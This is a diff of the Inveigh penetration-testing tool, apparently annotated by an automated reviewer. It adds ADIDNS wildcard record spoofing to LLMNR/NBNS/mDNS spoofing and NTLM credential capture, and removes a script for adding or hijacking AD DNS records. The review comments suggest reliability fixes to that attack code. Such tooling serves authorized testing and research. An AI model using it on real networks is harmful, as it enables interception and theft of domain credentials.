+ }
+ else
+ {
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh is exiting") > $null
+ }
+
OutputQueueLoop
Start-Sleep -S 1
$inveigh.running = $false
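Review bot: The Combo cleanup enumerates `$inveigh.DNS_table.Keys` (L3965) and assigns `$inveigh.DNS_table.$DNS_host = ""` inside the loop (L3977); if DNS_table is a .NET Hashtable, as the `.Keys` access suggests, a value replacement bumps its version and the next `MoveNext` throws "Collection was modified", raised by the `foreach` itself and therefore outside the try/catch, which aborts removal of every remaining record. Snapshot the keys first, `foreach($DNS_host in @($inveigh.DNS_table.Keys))`. The relay exit branch at L3999-L4002 also logs nothing when `$Message` is empty, while the Inveigh branch at L4018-L4021 has an `else` that logs a plain exit; the two should match. Stop-InveighRunspace's signature is in the previous hunk, outside this one.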
@@ -3523,6 +4566,11 @@ $control_scriptblock =
$inveigh.HTTPS = $false
}
+ if($inveigh.ADIDNS -eq 'Wildcard')
+ {
+ Invoke-ADIDNSSpoofer -Credential $ADIDNSCredential -Data $ADIDNSIP -Domain $ADIDNSDomain -DomainController $ADIDNSDomainController -Node '*' -Partition $ADIDNSPartition -TTL $ADIDNSTTL -Zone $ADIDNSZone
+ }
+
if($NBNSBruteForcePause)
{
$NBNS_pause = New-TimeSpan -Seconds $NBNSBruteForcePause
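Review bot: `Invoke-ADIDNSSpoofer` for the wildcard record (L4031) is the only ADIDNS call in the control scriptblock without a try/catch; the Disable-ADIDNSNode calls at L3949-L3958 and Invoke-ADIDNSCheck at L4054-L4063 both have one. An exception here (bad credentials, unreachable domain controller, an existing node) terminates the control runspace before its main loop starts, so console output, run-count/run-time checks and the `$inveigh.stop` handling never run and nothing is logged. Wrap it in the same try/catch pattern, logging `$_.Exception.Message` to `$inveigh.output_queue` with the `[!]` prefix, and consider recording that the record was not created so the Stop-InveighRunspace cleanup does not try to disable a node that never existed.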
@@ -3556,7 +4604,7 @@ $control_scriptblock =
if($inveigh.NTLMv1_list.Count -ge $run_count_NTLMv1 -or $inveigh.NTLMv2_list.Count -ge $run_count_NTLMv2 -or $inveigh.cleartext_list.Count -ge $run_count_cleartext)
{
- StopInveigh "run count"
+ Stop-InveighRunspace "run count"
}
}
@@ -3566,11 +4614,28 @@ $control_scriptblock =
if($control_stopwatch.Elapsed -ge $control_timeout)
{
- StopInveigh "run time"
+ Stop-InveighRunspace "run time"
}
}
+ if($inveigh.ADIDNS -eq 'Combo' -and $inveigh.request_table_updated)
+ {
+
+ try
+ {
+ Invoke-ADIDNSCheck -Credential $ADIDNSCredential -Data $ADIDNSIP -Domain $ADIDNSDomain -DomainController $ADIDNSDomainController -Ignore $ADIDNSHostsIgnore -Partition $ADIDNSPartition -RequestTable $inveigh.request_table -Threshold $ADIDNSThreshold -TTL $ADIDNSTTL -Zone $ADIDNSZone
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
+ }
+
+ $inveigh.request_table_updated = $false
+ }
+
if($inveigh.file_output)
{
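Review bot: `$inveigh.request_table_updated = $false` (L4065) is cleared after `Invoke-ADIDNSCheck` returns, so a request that a spoofer runspace records while the check is running is discarded and not evaluated until some later, unrelated request sets the flag again. Clear the flag before the call — move L4065 above the `try` at L4054 — so a concurrent update survives to the next loop iteration. The control loop this sits in starts outside the hunk.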
@@ -3618,13 +4683,19 @@ $control_scriptblock =
OutputQueueLoop
Start-Sleep -m 5
+
+ if($inveigh.stop)
+ {
+ $inveigh.console_queue.Clear()
+ Stop-InveighRunspace
+ }
+
}
- $inveigh.control = $false
}
-# End ScriptBlocks
-# Begin Startup Functions
+#endregion
+#region begin startup functions
# HTTP Listener Startup Function
function HTTPListener
@@ -3696,30 +4767,15 @@ function ProxyListener
# Sniffer/Spoofer Startup Function
function SnifferSpoofer
{
-
- if($inveigh.DNS)
- {
- $sniffer_initial_session_state = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
- $DNS_update_function_definition = Get-Content function:\Invoke-DNSUpdate
- $DNS_update_function_entry = New-Object System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList "Invoke-DNSUpdate", $DNS_update_function_definition
- $sniffer_initial_session_state.Commands.Add($DNS_update_function_entry)
- $sniffer_runspace = [RunspaceFactory]::CreateRunspace($sniffer_initial_session_state)
- }
- else
- {
- $sniffer_runspace = [RunspaceFactory]::CreateRunspace()
- }
-
+ $sniffer_runspace = [RunspaceFactory]::CreateRunspace()
$sniffer_runspace.Open()
$sniffer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$sniffer_powershell = [PowerShell]::Create()
$sniffer_powershell.Runspace = $sniffer_runspace
$sniffer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $sniffer_powershell.AddScript($DNS_functions_scriptblock) > $null
$sniffer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
- $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($DNSHostsIgnore).AddArgument(
- $DNSThreshold).AddArgument($DNSTTL).AddArgument($Evade).AddArgument($IP).AddArgument($LLMNR).AddArgument(
- $LLMNR_response_message).AddArgument($LLMNRTTL).AddArgument($mDNS).AddArgument(
+ $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($Evade).AddArgument($IP).AddArgument(
+ $LLMNR).AddArgument($LLMNR_response_message).AddArgument($LLMNRTTL).AddArgument($mDNS).AddArgument(
$mDNS_response_message).AddArgument($mDNSTypes).AddArgument($mDNSTTL).AddArgument(
$NBNS).AddArgument($NBNS_response_message).AddArgument($NBNSTypes).AddArgument($NBNSTTL).AddArgument(
$SMB).AddArgument($SpooferHostsIgnore).AddArgument($SpooferHostsReply).AddArgument(
@@ -3731,27 +4787,12 @@ function SnifferSpoofer
# Unprivileged LLMNR Spoofer Startup Function
function LLMNRSpoofer
{
-
- if($inveigh.DNS)
- {
- $LLMNR_spoofer_initial_session_state = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
- $DNS_update_function_definition = Get-Content function:\Invoke-DNSUpdate
- $DNS_update_function_entry = New-Object System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList "Invoke-DNSUpdate", $DNS_update_function_definition
- $LLMNR_spoofer_initial_session_state.Commands.Add($DNS_update_function_entry)
- $LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace($LLMNR_spoofer_initial_session_state)
- }
- else
- {
- $LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
- }
-
$LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
$LLMNR_spoofer_runspace.Open()
$LLMNR_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$LLMNR_spoofer_powershell = [PowerShell]::Create()
$LLMNR_spoofer_powershell.Runspace = $LLMNR_spoofer_runspace
$LLMNR_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $LLMNR_spoofer_powershell.AddScript($DNS_functions_scriptblock) > $null
$LLMNR_spoofer_powershell.AddScript($LLMNR_spoofer_scriptblock).AddArgument($Inspect).AddArgument(
$LLMNR_response_message).AddArgument($SpooferIP).AddArgument($SpooferHostsReply).AddArgument(
$SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument(
@@ -3768,7 +4809,6 @@ function mDNSSpoofer
$mDNS_spoofer_powershell = [PowerShell]::Create()
$mDNS_spoofer_powershell.Runspace = $mDNS_spoofer_runspace
$mDNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $mDNS_spoofer_powershell.AddScript($DNS_functions_scriptblock) > $null
$mDNS_spoofer_powershell.AddScript($mDNS_spoofer_scriptblock).AddArgument($Inspect).AddArgument(
$mDNS_response_message).AddArgument($mDNSTTL).AddArgument($mDNSTypes).AddArgument($SpooferIP).AddArgument(
$SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument(
@@ -3779,27 +4819,12 @@ function mDNSSpoofer
# Unprivileged NBNS Spoofer Startup Function
function NBNSSpoofer
{
-
- if($inveigh.DNS)
- {
- $NBNS_spoofer_initial_session_state = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
- $DNS_update_function_definition = Get-Content function:\Invoke-DNSUpdate
- $DNS_update_function_entry = New-Object System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList "Invoke-DNSUpdate", $DNS_update_function_definition
- $NBNS_spoofer_initial_session_state.Commands.Add($DNS_update_function_entry)
- $NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace($NBNS_spoofer_initial_session_state)
- }
- else
- {
- $NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
- }
-
$NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
$NBNS_spoofer_runspace.Open()
$NBNS_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$NBNS_spoofer_powershell = [PowerShell]::Create()
$NBNS_spoofer_powershell.Runspace = $NBNS_spoofer_runspace
$NBNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $NBNS_spoofer_powershell.AddScript($DNS_functions_scriptblock) > $null
$NBNS_spoofer_powershell.AddScript($NBNS_spoofer_scriptblock).AddArgument($Inspect).AddArgument(
$NBNS_response_message).AddArgument($SpooferIP).AddArgument($NBNSTypes).AddArgument(
$SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument(
@@ -3825,32 +4850,23 @@ function NBNSBruteForceSpoofer
# Control Loop Startup Function
function ControlLoop
{
- if($inveigh.DNS)
- {
- $control_initial_session_state = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
- $DNS_update_function_definition = Get-Content function:\Invoke-DNSUpdate
- $DNS_update_function_entry = New-Object System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList "Invoke-DNSUpdate", $DNS_update_function_definition
- $control_initial_session_state.Commands.Add($DNS_update_function_entry)
- $control_runspace = [RunspaceFactory]::CreateRunspace($control_initial_session_state)
- }
- else
- {
- $control_runspace = [RunspaceFactory]::CreateRunspace()
- }
-
+ $control_runspace = [RunspaceFactory]::CreateRunspace()
$control_runspace.Open()
$control_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$control_powershell = [PowerShell]::Create()
$control_powershell.Runspace = $control_runspace
$control_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $control_powershell.AddScript($control_scriptblock).AddArgument($ConsoleQueueLimit).AddArgument(
+ $control_powershell.AddScript($ADIDNS_functions_scriptblock) > $null
+ $control_powershell.AddScript($control_scriptblock).AddArgument($ADIDNSCredential).AddArgument(
+ $ADIDNSDomain).AddArgument($ADIDNSDomainController).AddArgument($ADIDNSHostsIgnore).AddArgument(
+ $ADIDNSIP).AddArgument($ADIDNSPartition).AddArgument($ADIDNSThreshold).AddArgument(
+ $ADIDNSTTL).AddArgument($ADIDNSZone).AddArgument($ConsoleQueueLimit).AddArgument(
$NBNSBruteForcePause).AddArgument($RunCount).AddArgument($RunTime) > $null
$control_powershell.BeginInvoke() > $null
}
-# End Startup Functions
-
-# Startup Enabled Services
+#endregion
+#region begin startup enabled services
# HTTP Server Start
if($HTTP -eq 'Y')
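Review bot: The nine ADIDNS values added to the `AddArgument` chain on the `$control_powershell.AddScript($control_scriptblock)` call are bound positionally, so the `param()` block of `$control_scriptblock` (outside this hunk) must list them in exactly this order; a mismatch binds silently, and `$ADIDNSCredential` could land in another variable without any error. Binding by name, e.g. `.AddParameter('ADIDNSCredential',$ADIDNSCredential)`, removes that coupling; at minimum a comment such as `# argument order must match the param() block of $control_scriptblock` belongs above the chain. The other startup functions use the same positional pattern, so the ordering contract is worth stating once.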
@@ -4147,8 +5163,8 @@ finally
}
}
-#End Invoke-Inveigh
-
+#endregion
+#region begin support functions
function Stop-Inveigh
{
<#
@@ -4156,76 +5172,40 @@ function Stop-Inveigh
Stop-Inveigh will stop all running Inveigh functions.
#>
-if($inveigh)
-{
-
- if($inveigh.running -or $inveigh.relay_running)
+ if($inveigh)
{
-
- if($inveigh.DNS_list.Count -gt 0)
+ $inveigh.stop = $true
+
+ if($inveigh.running -or $inveigh.relay_running)
{
-
- foreach($DNS_host in $inveigh.DNS_list)
+ $inveigh.console_queue.Clear()
+ Watch-Inveigh -NoConsoleMessage
+ <#
+ if($inveigh.relay_running)
{
-
- if($DNS_host.StartsWith("1,"))
- {
-
- $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNS_host.SubString(2)
-
- if($DNS_update -eq "[+] DNS update successful")
- {
- $output = "[+] [$(Get-Date -format s)] DNS host (A) record for " + $DNS_host.SubString(2) + " removed"
- Write-Output $output
- }
- else
- {
- $output = "[-] [$(Get-Date -format s)] DNS host (A) record for " + $DNS_host.SubString(2) + " remove failed"
- Write-Warning $output
- }
-
- if($inveigh.file_output)
- {
- $output | Out-File $Inveigh.log_out_file -Append
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add($output) > $null
- }
+ $output = "[*] [$(Get-Date -format s)] Inveigh Relay is exiting"
+ if($inveigh.file_output)
+ {
+ $output | Out-File $Inveigh.log_out_file -Append
}
- }
-
- $inveigh.DNS_list = New-Object System.Collections.ArrayList
- $inveigh.requested_host_list = New-Object System.Collections.ArrayList
- $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
- }
-
- if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
- {
-
- try
- {
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
-
- ForEach($certificate in $certificates)
+ if($inveigh.log_output)
{
- $certificate_store.Remove($certificate)
+ $inveigh.log.Add($output) > $null
}
- $certificate_store.Close()
- }
- catch
+ Write-Output $output
+ $inveigh.relay_running = $false
+ }
+
+ if($inveigh.running)
{
- $output = "[-] [$(Get-Date -format s)] SSL Certificate Deletion Error [Remove Manually]"
+ $output = "[*] [$(Get-Date -format s)] Inveigh is exiting"
if($inveigh.file_output)
{
- $output | Out-File $Inveigh.log_out_file -Append
+ $output | Out-File $Inveigh.log_out_file -Append
}
if($inveigh.log_output)
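Review bot: The removed lines took two cleanup steps out of Stop-Inveigh — deleting the DNS records Inveigh had added and removing the certificate issued by `$inveigh.certificate_issuer` from `Cert:\LocalMachine\My` — while the new branch only sets `$inveigh.stop = $true` and waits, and nothing in this hunk shows where those steps now happen. If the control loop is meant to perform them when it observes `$inveigh.stop` (not visible here), a comment such as `# record and certificate cleanup is handled by the control loop once $inveigh.stop is set` would make that contract explicit; otherwise stopping leaves the certificate in the machine store. The `<#` opened after `Watch-Inveigh -NoConsoleMessage` turns the previous exit logging and flag resets into a large dead block; deleting it would be cleaner than commenting it out. Stop-Inveigh continues past the end of this hunk.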
@@ -4233,59 +5213,23 @@ if($inveigh)
$inveigh.log.Add($output) > $null
}
- Write-Warning $output
+ #Write-Output $output
+ $inveigh.running = $false
}
+ $inveigh.HTTPS = $false
+ #>
+ Start-Sleep -S 5
}
-
- if($inveigh.relay_running)
- {
- $output = "[*] [$(Get-Date -format s)] Inveigh Relay is exiting"
-
- if($inveigh.file_output)
- {
- $output | Out-File $Inveigh.log_out_file -Append
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add($output) > $null
- }
-
- Write-Output $output
- $inveigh.relay_running = $false
- }
-
- if($inveigh.running)
+ else
{
- $output = "[*] [$(Get-Date -format s)] Inveigh is exiting"
-
- if($inveigh.file_output)
- {
- $output | Out-File $Inveigh.log_out_file -Append
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add($output) > $null
- }
-
- Write-Output $output
- $inveigh.running = $false
+ Write-Output "[-] There are no running Inveigh functions"
}
- $inveigh.HTTPS = $false
- Start-Sleep -S 5
- }
- else
- {
- Write-Output "[-] There are no running Inveigh functions"
}
}
-}
-
function Get-Inveigh
{
<#
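Review bot: `Start-Sleep -S 5` is a fixed delay; nothing in the hunk confirms that the runspaces have cleared `$inveigh.running` or `$inveigh.relay_running` before Stop-Inveigh returns, since the code that reset those flags directly now sits inside the `#>` comment block. If the control loop clears them on `$inveigh.stop` (not visible here), a bounded poll returns as soon as shutdown completes and still caps the wait; if it does not, Stop-Inveigh should reset them itself as before. The function's body begins before this hunk.
```powershell
            $stop_wait = 0
            # poll the shared flags instead of a fixed delay; cap at about 5 seconds
            while(($inveigh.running -or $inveigh.relay_running) -and $stop_wait -lt 50)
            {
                Start-Sleep -m 100
                $stop_wait++
            }
```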
@@ -4404,12 +5348,12 @@ Get relay session list.
if($DNS)
{
- foreach($DNS in $inveigh.DNS_list)
+ foreach($DNS_host in $inveigh.DNS_table.Keys)
{
- if($DNS.StartsWith("1,"))
+ if($inveigh.DNS_table.$DNS_host -eq 1)
{
- Write-Output $DNS.Substring(2)
+ Write-Output $DNS_host
}
}
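Review bot: `$inveigh.DNS_table.$DNS_host` reads the entry through member access, so a key that happens to match a Hashtable member name (for example `Count` or `Keys`) returns that member instead of the stored value; the indexer `$inveigh.DNS_table[$DNS_host] -eq 1` avoids this, and the same applies to the `-eq 0` test in the DNSFailed hunk below. Enumerating `$inveigh.DNS_table.Keys` while the spoofing runspaces may still be inserting entries (the table's construction is outside this hunk) can also throw "Collection was modified" unless the table is a synchronized one; iterating over a copy or guarding with the table's SyncRoot would be safer. The literals 1 and 0 would read better with a comment stating what each value records.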
@@ -4419,12 +5363,12 @@ Get relay session list.
if($DNSFailed)
{
- foreach($DNS in $inveigh.DNS_list)
+ foreach($DNS_host in $inveigh.DNS_table.Keys)
{
- if($DNS.StartsWith("0,"))
+ if($inveigh.DNS_table.$DNS_host -eq 0)
{
- Write-Output $DNS.Substring(2)
+ Write-Output $DNS_host
}
}
@@ -4555,7 +5499,8 @@ Watch-Inveigh will enabled real time console output. If using this function thro
[CmdletBinding()]
param
(
- [parameter(Mandatory=$false)][ValidateSet("Low","Medium")][String]$ConsoleOutput = "Y",
+ [parameter(Mandatory=$false)][Switch]$NoConsoleMessage,
+ [parameter(Mandatory=$false)][ValidateSet("Low","Medium","Y")][String]$ConsoleOutput = "Y",
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
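Review bot: The new `-NoConsoleMessage` switch is not documented in this hunk; if the comment-based help above (outside the hunk) lacks a matching entry, add `.PARAMETER NoConsoleMessage` with text along the lines of `Suppresses the "Press any key" prompt; used when Stop-Inveigh drains the console queue.` Adding `"Y"` to the ValidateSet makes the existing default a legal explicit value, but the help for ConsoleOutput should state what `Y` selects relative to `Low` and `Medium`, as the name does not convey it.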
@@ -4564,7 +5509,11 @@ if($inveigh.tool -ne 1)
if($inveigh.running -or $inveigh.relay_running)
{
- Write-Output "[*] Press any key to stop real time console output"
+ if(!$NoConsoleMessage)
+ {
+ Write-Output "[*] Press any key to stop real time console output"
+ }
+
$inveigh.console_output = $true
:console_loop while((($inveigh.running -or $inveigh.relay_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
@@ -4661,4 +5610,6 @@ if($inveigh)
}
+#endregion
+
} \ No newline at end of file
diff --git a/Invoke-DNSUpdate.ps1 b/Invoke-DNSUpdate.ps1
deleted file mode 100644
index 658d486..0000000
--- a/Invoke-DNSUpdate.ps1
+++ /dev/null
@@ -1,1437 +0,0 @@
-function Invoke-DNSUpdate
-{
- <#
- .SYNOPSIS
- This function performs secure and nonsecure DNS dynamic updates against an AD domain controller. Authentication
- for secure updates is performed through Kerberos GSS-TSIG.
-
- Author: Kevin Robertson (@kevin_robertson)
- License: BSD 3-Clause
-
- .DESCRIPTION
- This function can be used to add/delete dynamic DNS records through secure or nonsecure dynamic updates against an
- AD domain controller. A, AAAA, CNAME, MX, PTR, SRV, and TXT records are currently supported. Invoke-DNSUpdate is modeled
- after BIND`s nsupdate tool when using the '-g' or 'gsstsig' options for secure updates or no authentication for
- nonsecure updates.
-
- By default, Active Directory-integrated zones have secure dynamic updates enabled with authenticated users having
- 'Create all child objects' permission. Records that do not exist in an AD zone can be added/deleted with a standard
- user account. Existing records created by default or created by other users impose limitations. For example, creating
- records that apply to the root of the zone or creating additional SRV records for kerberos/ldap will likely be blocked
- due to existing records. Note however that older existing dynamic records can sometimes be hijacked. Subdomain folders
- can also be created.
-
- With secure dynamic updates, this function supports only GSS-TSIG through Kerberos AES256-CTS-HMAC-SHA1-96 using
- two separate methods. By default, the function will have Windows perform all Kerberos steps up until the AP-REQ
- is sent to DNS on the DC. This method will work with either the current session context or with specified credentials.
- The second method performs Kerberos authentication using just PowerShell code over a TCPClient connection. This method
- will accept a password or AES256 hash and will not place any tickets in the client side cache.
-
- In the event that a zone is configured for nonsecure dynamic updates, you should have full control over the zone.
-
- Note that wpad and isatap are on a block list by default starting with Server 2008. Although the records can be added
- with both secure and nonsecure dynamic updates, AD DNS will not answer requests for wpad and isatap if they are listed
- on the block list.
-
- .PARAMETER DomainController
- Domain controller to target in FQDN format.
-
- .PARAMETER Realm
- Kerberos realm.
-
- .PARAMETER Username
- Username of user with DNS secure dynamic update access. If using a machine account, the trailing '$' must be
- included.
-
- .PARAMETER Password
- Password of user with DNS secure dynamic update access. The password must be in the form of a secure string.
-
- .PARAMETER Hash
- AES256 password hash for user with DNS secure dynamic update access. Note that this will use Kerberos
- authentication built on top of TCPClient.
-
- .PARAMETER Security
- Default = Secure: (Auto/Nonsecure/Secure) Dynamic update security type. Auto will attempt to use nonsecure. If
- nonsecure fails, secure will be used. This is the standard dynamic update behavior. Secure is the default
- because it generates less traffic.
-
- .PARAMETER DNSName
- DNS record name.
-
- .PARAMETER DNSData
- DNS records data. For most record types this will be the destination hostname or IP address. For TXT records
- this can be used for data. If deleting a record, leave off this parameter.
-
- .PARAMETER DNSType
- DNS record type.
-
- .PARAMETER DNSTTL
- DNS record TTL.
-
- .PARAMETER DNSPreference
- DNS MX record priority
-
- .PARAMETER DNSPriority
- DNS SRV record priority.
-
- .PARAMETER DNSWeight
- DNS SRV record weight.
-
- .PARAMETER DNSPort
- DNS SRV record port.
-
- .PARAMETER DNSZone
- DNS zone.
-
- .PARAMETER TCPClientAuth
- Switch to force usage of the TCPClient based Kerberos authentication.
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType A -DNSName www.test.local -DNSData 192.168.100.125 -DNSTTL 84600
- Add A Record
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType AAAA -DNSName www.test.local -DNSData 2001:0db8:85a3:0000:0000:8a2e:0370:7334
- Add AAAA Record
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType CNAME -DNSName www.test.local -DNSData system.test.local
- Add CNAME Record
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType MX -DNSName test.local -DNSData 192.168.100.125 -DNSPreference 10
- Add MX Record
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType PTR -DNSName 125.100.168.192.in-addr.arpa -DNSData www.test.local -DNSZone 100.168.192.in-addr.arpa
- Add PTR Record - there is a good chance this will be denied if there is an existing record for an IP
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType SRV -DNSName _autodiscover._tcp.lab.local -DNSData system.test.local -DNSPriority 100 -DNSWeight 80 -DNSPort 443
- Add SRV Record
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType TXT -DNSName host.test.local -DNSData "some text"
- Add TXT Record
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType TXT -DNSName host.test.local
- Delete TXT record - all deletes follow the same format, just specify DNSType and DNSName
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType A -DNSName www.test.local -Username testuser
- Add A record using another account
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType A -DNSName www.test.local -Username testuser -Hash 0C27E0A5B0D69640B40DDED4A28EB3BB0D157659EBED2816A41A8228E98D111B
- Add A record using another account and an AES256 hash
-
- .LINK
- https://github.com/Kevin-Robertson/Powermad
- #>
-
- [CmdletBinding()]
- param
- (
- [parameter(Mandatory=$false)][String]$DomainController,
- [parameter(Mandatory=$false)][String]$Realm,
- [parameter(Mandatory=$false)][String]$Username,
- [parameter(Mandatory=$false)][System.Security.SecureString]$Password,
- [parameter(Mandatory=$false)][ValidateScript({$_.Length -eq 64})][String]$Hash,
- [parameter(Mandatory=$false)][String]$DNSZone,
- [parameter(Mandatory=$false)][Int]$DNSTTL = 600,
- [parameter(Mandatory=$false)][Int]$DNSPreference,
- [parameter(Mandatory=$false)][Int]$DNSPriority,
- [parameter(Mandatory=$false)][Int]$DNSWeight,
- [parameter(Mandatory=$false)][Int]$DNSPort,
- [parameter(Mandatory=$false)][ValidateSet("Auto","Nonsecure","Secure")][String]$Security = "Secure",
- [parameter(Mandatory=$true)][ValidateSet("A","AAAA","CNAME","MX","PTR","SRV","TXT")][String]$DNSType,
- [parameter(Mandatory=$true)][String]$DNSName,
- [parameter(Mandatory=$false)][ValidateScript({$_.Length -le 255})][String]$DNSData,
- [parameter(Mandatory=$false)][Switch]$TCPClientAuth
- )
-
- if($TCPClientAuth -and !$Username)
- {
- Write-Output "[-] TCPClientAuth requires a username"
- throw
- }
-
- switch ($DNSType)
- {
-
- 'MX'
- {
-
- if(!$DNSPreference)
- {
- Write-Output "[-] MX records require a DNSPreference"
- throw
- }
-
- }
-
- 'PTR'
- {
-
- if(!$DNSZone)
- {
- Write-Output "[-] PTR records require a DNSZone"
- throw
- }
-
- }
-
- 'SRV'
- {
-
- if(!$DNSPriority -and !$DNSWeight -and !$DNSPort -and $DNSData)
- {
- Write-Output "[-] DNSType SRV requires DNSPriority, DNSWeight, and DNSPort"
- throw
- }
-
- if($DNSName -notlike '*._tcp.*' -and $DNSName -notlike '*._udp.*')
- {
- Write-Output "[-] DNSName doesn't contain a protocol"
- throw
- }
-
- }
-
- }
-
- if($Username -and !$Hash)
- {
- $password = Read-Host -Prompt "Enter password" -AsSecureString
- }
-
- if(!$DomainController)
- {
-
- try
- {
- $current_domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
- $DomainController = $current_domain.DomainControllers[0].Name
- $domain = $current_domain.Name
- }
- catch
- {
- Write-Output "[-] Domain controller not located"
- throw
- }
-
- }
- else
- {
- $realm_index = $DomainController.IndexOf(".")
- $domain = $DomainController.Substring($realm_index + 1)
- }
-
- if(!$Realm)
- {
- $realm = $domain
- }
-
- if($TCPClientAuth -or $Hash)
- {
-
- $kerberos_tcpclient = $true
- $realm = $realm.ToUpper()
-
- if($username -like "*\*")
- {
- $username = $username.SubString(($username.IndexOf("\") + 1),($username.Length - ($username.IndexOf("\") + 1)))
- }
-
- if($username -like "*@*")
- {
- $username = $username.SubString(0,($username.IndexOf("@")))
- }
-
- if($Username.EndsWith("$"))
- {
- $salt = $realm + "host" + $Username.SubString(0,$Username.Length - 1) + "." + $realm.ToLower()
- }
- else
- {
- $salt = $realm + $Username
- }
-
- Write-Verbose "[+] Salt $salt"
- }
-
- if(!$DNSZone)
- {
- $DNSZone_index = $DomainController.IndexOf(".")
- $DNSZone = $DomainController.Substring($DNSZone_index + 1)
- }
-
- $DNSZone = $DNSZone.ToLower()
-
- function ConvertFrom-PacketOrderedDictionary
- {
- param($ordered_dictionary)
-
- ForEach($field in $ordered_dictionary.Values)
- {
- $byte_array += $field
- }
-
- return $byte_array
- }
-
- function Get-KerberosAES256UsageKey
- {
- param([String]$key_type,[Int]$usage_number,[Byte[]]$base_key)
-
- $padding = 0x00 * 16
-
- if($key_type -eq 'checksum')
- {
- switch($usage_number)
- {
- 25 {[Byte[]]$usage_constant = 0x5d,0xfb,0x7d,0xbf,0x53,0x68,0xce,0x69,0x98,0x4b,0xa5,0xd2,0xe6,0x43,0x34,0xba + $padding}
- }
- }
- elseif($key_type -eq 'encrypt')
- {
-
- switch($usage_number)
- {
- 1 {[Byte[]]$usage_constant = 0xae,0x2c,0x16,0x0b,0x04,0xad,0x50,0x06,0xab,0x55,0xaa,0xd5,0x6a,0x80,0x35,0x5a + $padding}
- 3 {[Byte[]]$usage_constant = 0xbe,0x34,0x9a,0x4d,0x24,0xbe,0x50,0x0e,0xaf,0x57,0xab,0xd5,0xea,0x80,0x75,0x7a + $padding}
- 4 {[Byte[]]$usage_constant = 0xc5,0xb7,0xdc,0x6e,0x34,0xc7,0x51,0x12,0xb1,0x58,0xac,0x56,0x2a,0x80,0x95,0x8a + $padding}
- 7 {[Byte[]]$usage_constant = 0xde,0x44,0xa2,0xd1,0x64,0xe0,0x51,0x1e,0xb7,0x5b,0xad,0xd6,0xea,0x80,0xf5,0xba + $padding}
- 11 {[Byte[]]$usage_constant = 0xfe,0x54,0xaa,0x55,0xa5,0x02,0x52,0x2f,0xbf,0x5f,0xaf,0xd7,0xea,0x81,0x75,0xfa + $padding}
- 12 {[Byte[]]$usage_constant = 0x05,0xd7,0xec,0x76,0xb5,0x0b,0x53,0x33,0xc1,0x60,0xb0,0x58,0x2a,0x81,0x96,0x0b + $padding}
- }
-
- }
- elseif($key_type -eq 'integrity')
- {
-
- switch($usage_number)
- {
- 1 {[Byte[]]$usage_constant = 0x5b,0x58,0x2c,0x16,0x0a,0x5a,0xa8,0x05,0x56,0xab,0x55,0xaa,0xd5,0x40,0x2a,0xb5 + $padding}
- 4 {[Byte[]]$usage_constant = 0x72,0xe3,0xf2,0x79,0x3a,0x74,0xa9,0x11,0x5c,0xae,0x57,0x2b,0x95,0x40,0x8a,0xe5 + $padding}
